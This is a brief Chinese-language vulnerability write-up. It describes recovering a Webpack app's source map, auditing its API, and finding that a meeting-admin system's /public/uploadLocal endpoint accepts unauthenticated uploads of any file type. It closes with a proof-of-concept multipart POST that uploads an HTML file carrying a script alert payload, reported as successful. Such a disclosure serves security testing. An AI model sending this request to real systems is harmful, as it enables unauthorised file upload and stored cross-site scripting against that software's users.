Webpack系统插件识别框架app.xxx.js 这个文件算是一个webpack打包的特征文件。拼接app.xxjs.map下载文件反编译对接口进行审计找未授权接口。搜索/public/uploadLocal的代码两个文件都使用了/public/uploadLocal接口查看代码(前端代码)这个接口没有做身份验证对上传的文件类型也没有做验证POCPOST /meeting_admin_interface/public/uploadLocal HTTP/1.1 Host: Content-Type: multipart/form-data; boundary----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; namefolder ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; namefile; filename1.html Content-Type: image/svgxml scriptalert(1)/script ------WebKitFormBoundary7MA4YWxkTrZu0gW--上传成功